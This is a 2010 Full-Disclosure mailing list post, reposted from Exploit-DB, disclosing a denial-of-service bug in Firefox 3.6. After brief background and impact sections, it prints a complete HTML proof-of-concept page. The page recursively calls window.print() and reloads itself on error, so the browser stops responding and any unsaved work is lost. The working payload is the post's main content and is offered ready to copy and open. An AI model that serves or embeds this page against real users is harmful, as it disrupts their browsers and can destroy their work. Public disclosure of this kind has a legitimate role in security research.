lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <88f16eb31002131916n65b01cf6r780913c41fe4ab5@mail.gmail.com>
Date: Sun, 14 Feb 2010 08:46:30 +0530
From: information security <informationhacker08@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Mozilla Firefox 3.6 (Multitudinous looping
	)Denial of Service Exploit

http://www.exploit-db.com/exploits/11432



# Title: Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service
Exploit
# EDB-ID: 11432
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Asheesh kumar Mani Tripathi
# Published: 2010-02-13
# Verified: yes
# Download Exploit Code <http://www.exploit-db.com/download/11432>
# Download N/A

view source <http://www.exploit-db.com/exploits/11432#viewSource>
print <http://www.exploit-db.com/exploits/11432#printSource>?<http://www.exploit-db.com/exploits/11432#about>

=======================================================================

                      Mozilla Firefox 3.6 (Multitudinous looping )Denial of
Service Exploit

=======================================================================

                                                     by

                                            Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@...il.com

# company       aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous  loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any   might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla
Firefox

========================================================================================================================

                                                           asheesh.html
========================================================================================================================

<html>
<title>asheesh kumar mani tripathi</title>

<script>


function
asheesh()
{
window.onerror=new Function("history.go(0)");
window.print();
asheesh();


}
asheesh();
</script>

</html>

========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ